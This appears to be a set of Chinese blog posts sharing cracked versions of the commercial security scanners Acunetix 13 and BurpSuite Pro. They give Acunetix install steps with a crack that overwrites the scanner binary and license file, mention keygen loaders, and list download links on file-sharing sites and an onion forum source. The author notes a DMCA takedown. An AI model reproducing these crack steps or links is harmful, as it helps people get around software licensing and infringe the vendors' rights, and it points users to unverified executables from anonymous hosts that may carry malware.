We are actively testing other Linux distributions. Please let us know if you have requests for specific distros.

- CPU: 64 bit processor

- System memory: minimum of 2 GB RAM

- Storage: 1 GB of available hard-disk space.



下面是需要安装的依赖:

Installation on Linux

Download the latest Linux version of Acunetix from the download location provided when you purchased the license.

Open a Terminal Windows

Use chmod to add executable permissions on the installation file

E.g. chmod +x acunetix_13.0.200205121_x64.sh

Run the installation

E.g. sudo ./acunetix_13.0.200205121_x64.sh

In case there are dependencies missing see the Notes section

Review and accept the License Agreement.

Configure the hostname which will be used to access the Acunetix UI

Provide credentials for the Administrative user account. These will be used to access and configure Acunetix.

Proceed with the installation.



如果你的系统没有GUI,则需要安装如下依赖:

On Ubuntu Server:

sudo apt-get install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 libx11-xcb1

On Suse Linux Enterprise Server or OpenSUSE Leap:

sudo zypper install libXdamage1 libgtk-3-0 libasound2 mozilla-nss libX11-xcb1 libXss1

On Red Hat Enterprise Linux:

sudo yum update

sudo yum install libX11 libX11-devel gtk3 nss libXScrnSaver alsa-lib bzip2



官方安装文档:https://www.acunetix.com/support/docs/wvs/installing-acunetix-wvs/&nbsp;



解压后的破解版安装步骤:

# 安装前必须卸载之前的版本

1. chmod +x acunetix_13.0.200217097x64.sh #赋予执行权限

2. ./acunetix_13.0.200217097x64.sh #执行安装脚本

3. cp Crack/wvsc /home/acunetix/.acunetix/v_200217097/scanner/ #覆盖安装,或者不源文件 重命名

4. cp Crack/license_info.json /home/acunetix/.acunetix/data/license/ #覆盖安装,或者不源文件 重命名

5. 重新启动 acunetix 即可

打开 https://yourip:3443
登录即可使用.

注:账号密码是在你安装过程中自己设置的.



下载地址:

https://www32.zippyshare.com/v/V8LDIgDk/file.html



来源:https://xsstorweb56srs3a.onion/threads/35181/


Mrxn 发布于 2020-2-28 16:38

BurpSuite_pro_v2020.1汉化+破解版下载 安全工具

burpsuite pro v2020.1 破解后的license:

burpsuite pro 2020.1.png



burpsuite pro v2020.1 汉化后的license界面:

burpsuite pro 2020.1汉化.png

注:所有的汉化破解教程都需要在你安装好Java环境的前提下,
即你在cmd命令行里面执行java和javac这两个命令会有输出。


推荐使用Java8即可适配burprsuite1.7或2.0+。

Java8 安装下载教程可以参考这个教程(里面提供了Oracle账号,下载jdk需要账号登录):

如何在64位Windows 10下安装java开发环境.pdf

有GitHub账号的可以顺手点个star,里面有很多关于burpsuite的插件和教程。

汉化破解教程:

先按照这个教程破解后 :https://mrxn.net/hacktools/Burp_Suite_Pro_v1_7_3_2_Loader_Keygen_Cracked_Share.html

再去执行 【创建桌面快捷方式.bat】即可在桌面创建汉化的快捷方式。

执行【Create-Desktop-Link.bat】即可在桌面创建英文原版的快捷方式。



burpsuite_pro_v2020.1.zip文件包含:

+--- burp-loader-keygen-2020_1.jar

+--- burpsuite pro 2020.1.png

+--- burpsuite pro 2020.1汉化.png

+--- BurpSuiteChs.jar

+--- burpsuite_pro_v2020.1.jar

+--- Burp_start.bat

+--- Burp_start_en.bat

+--- Create-Desktop-Link.bat

+--- Goescat-Macaron-Burp-suite.ico

+--- jython.jar

+--- 创建桌面快捷方式.bat

+--- 汉化破解说明.txt





下载地址:

http://tmp.link/f/5e53630ba1fdd

https://www79.zippyshare.com/v/d0pMoYPg/file.html


备用地址,如果速度慢需要代理:

https://mir.cr/1EFTTD3O

https://tusfiles.com/yfhl5gdgwyu0
https://userscloud.com/w0760j7n2wct
https://uptobox.com/v65hsq7l6le8

Mrxn 发布于 2020-2-24 08:30

burpsuite_pro_v2.1.07.jar及burp-loader-keygen-2_1_07.jar下载 安全工具

burpsuite破解成功后的license界面:

burpsuite_pro_v2.1.0.7.png

之前的老版本比如:

BurpSuite 1.7.32 Cracked 破解版[注册机]下载

在GitHub上的有关burpsuite项目,https://github.com/Mr-xn/BurpSuite-collections&nbsp;

因为被burpsuite官方向GitHub发了一个DMCA:https://github.com/github/dmca/blob/master/2020/01/2020-01-15-burpsuite.md&nbsp;

项目被封禁了一周,我后来多次联系GitHub,删除破解相关的文件,才放出来.

再此对GitHub表示抱歉,带来麻烦,同时也抱歉给burpsuite带来不好的影响。

初衷是为了方便渗透测试人员和安全研究人员使用,并不是商用,也不知道是不是有人商用被burp查到了,还是我的项目在GitHub上的star多了?反正放过出来后。star全部为0... 

啥也不说了,保持初衷不变,继续给学习研究者使用,禁止商用!

下载:

https://drive.google.com/open?id=1n0eB-7nPK-hwJMpyz950egAKjq0yfW-B&nbsp;

https://www35.zippyshare.com/v/VKqEnLq5/file.html&nbsp;

https://www.mirrored.to/files/0HHQQTTU/&nbsp;

如有连接失效,请留言或者GitHub提issues。


Mrxn 发布于 2020-1-27 12:47